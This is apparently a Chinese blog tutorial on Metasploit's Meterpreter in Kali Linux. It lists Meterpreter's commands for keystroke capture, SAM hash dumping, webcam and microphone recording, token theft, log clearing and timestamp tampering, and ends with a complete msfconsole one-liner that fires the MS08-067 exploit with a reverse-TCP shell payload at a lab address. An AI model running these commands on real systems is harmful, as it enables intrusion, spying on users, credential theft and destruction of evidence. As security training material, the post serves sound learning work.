kali linux之Meterpreter

高级,动态,可扩展的payload

    基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面

完全基于内存的dll注入式payload(不写硬盘)

    注入合法系统进程并建立stager

    基于stager上传和预加载dll进行扩展模块的注入(客户端api)

    基于stager建立的socket连接建立加密的TLS/1.0通信隧道

    利用TLS隧道进一步加载后续扩展模块(避免网络取证)

服务端使用C语言编写

客户端提供基于ruby的全特性api(支持任何语言)

 

 

 

 

 

 

 

 

meterpreter>帮助
核心命令
=============

    命令描述
    ------- -----------
    ?                                                    帮助菜单
    background                                     回到当前会话
    bg                    别名为背景
    bgkill                  杀死背景meterpreter脚本
    bglist                  列出运行后台脚本
    bgrun                      在后台执行一个meterpreter脚本
    channel                显示信息或控制活动通道
    close                  关闭频道
    disable_unicode_encoding              禁用unicode字符串的编码
    enable_unicode_encoding              启用unicode字符串的编码
    exit                    终止meterpreter会话
    get_timeouts               获取当前会话超时值
    guid              获取会话GUID
    help              帮助菜单
    info              显示有关Post模块的信息
    irb                在当前会话中打开交互式Ruby shell
    load              加载一个或多个meterpreter扩展
    machine_id          获取附加到会话的计算机的MSF ID
    migrate            将服务器迁移到另一个进程
    pivot              管理数据透视侦听器
    pry              在当前会话中打开Pry调试器
    quit              终止meterpreter会话
    read              从通道读取数据
    resource               运行存储在文件中的命令
    run              执行meterpreter脚本或Post模块
    sessions            快速切换到另一个会话
    set_timeouts           设置当前会话超时值
    sleep              强制Meterpreter安静,然后重新建立会话。
    transport            更改当前的传输机制
    use              不推荐使用的别名“load”
    uuid              获取当前会话的UUID
    write              将数据写入通道


Stdapi:文件系统命令
============================

    命令描述
    ------- -----------
    cat            将文件内容读入屏幕
    cd             更改目录
    checksum          检索文件的校验和
    cp            将源复制到目标
    dir            列表文件(ls的别名)
    download          下载文件或目录
    edit            编辑文件
    getlwd           打印本地工作目录
    getwd            打印工作目录
    lcd            更改本地工作目录
    lls            列出本地文件
    lpwd           打印本地工作目录
    ls            列出文件
    mkdir           制作目录
    mv            将源移动到目标
    pwd           打印工作目录
    rm               删除指定的文件
    rmdir           删除目录
    search          搜索文件
    show_mount             列出所有挂载点/逻辑驱动器
    upload                 上传文件或目录


Stdapi:网络命令
===========================

    命令描述
    ------- -----------
    arp          显示主机ARP缓存
    getproxy        显示当前的代理配置
    ifconfig        显示接口
    ipconfig         显示接口
    netstat        显示网络连接
    portfwd        将本地端口转发到远程服务
    resolve        解析目标上的一组主机名
    route          查看和修改路由表


Stdapi:系统命令
=======================

    命令描述
    ------- -----------
    clearev          清除事件日志
    drop_token         放弃任何活动的模拟令牌。
    execute          执行命令
    getenv                     获取一个或多个环境变量值
    getpid                      获取当前进程标识符
    getprivs              尝试启用当前进程可用的所有权限
    getsid            获取运行服务器的用户的SID
    getuid           获取服务器正在运行的用户
    kill            终止进程
    localtime           显示目标系统的本地日期和时间
    pgrep           按名称过滤进程
    pkill              按名称终止进程
    ps              列出正在运行的进程
    reboot          重新启动远程计算机
    reg            修改远程注册表并与之交互
    rev2self          在远程计算机上调用RevertToSelf()
    shell            进入系统命令shell
    shutdown         关闭远程计算机
    steal_token           尝试从目标进程中窃取模拟令牌
    suspend          暂停或恢复进程列表

    sysinfo          关于远程系统的信息,例如OS


Stdapi:用户界面命令
===============================

    命令描述
    ------- -----------
    enumdesktops      列出所有可访问的桌面和窗口站
    getdesktop        获取当前的meterpreter桌面
    idletime         返回远程用户空闲的秒数
    keyscan_dump      转储击键缓冲区
    keyscan_start      开始捕获击键
    keyscan_sto        停止捕获击键
    screenshot        获取交互式桌面的屏幕截图
    setdesktop        更改meterpreters当前桌面
    uictl           控制一些用户界面组件


Stdapi:网络摄像头命令
=======================

    命令描述
    ------- -----------
    record_mic        从默认麦克风录制音频X秒
    webcam_chat       开始视频聊天
    webcam_list         列出网络摄像头
    webcam_snap      从指定的网络摄像头拍摄快照
    webcam_stream      播放指定网络摄像头的视频流


Stdapi:音频输出命令
=============================

    命令描述
    ------- -----------
    play        播放在目标系统上播放音频文件,没有写在磁盘上


Priv:提升命令
======================

    命令描述
    ------- -----------
    getsystem      尝试将您的权限提升为本地系统的权限。


Priv:密码数据库命令
================================

    命令描述
    ------- -----------
    hashdump        转储SAM数据库的内容


Priv:Timestomp命令
========================

    命令描述
    ------- -----------
    timestomp        操作文件MACE属性

 

 

 

 查看系统

 

查看文件及文件夹

 

列出进程

 

更改文件名字

 

在后台运行一个进程

 

 先查看本机文件

然后上传一个文件到目标上

 

使用vnc

 

删除所有日志

 

下载目标的文件

 

 

先ps 列出进程 然后migrate 7636 把自己迁移到id号为7636这个进程里面

 

下载hash

 

查看挂载了几个硬盘

 

搜索某个文件

 

arp缓存

 

目标操作系统空闲时间

 

 记录麦克风(我虚拟机没有)

 

 列出主机有几个摄像头(我虚拟机没有)

 

 如果有的话就可以打开摄像头

 

 

 

python扩展---无需运行环境,在客户端运行原生python代码

load导入python扩展,写python代码即可

 

 

msfconsole -x(编写脚本时便于引用)

 

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.13;set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.12;set LPORT 4444;exploit"

 

 

 

 

 

 

 友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

 

posted @ 2019-03-07 15:53  Hydraxx  阅读(2004)  评论(0编辑  收藏  举报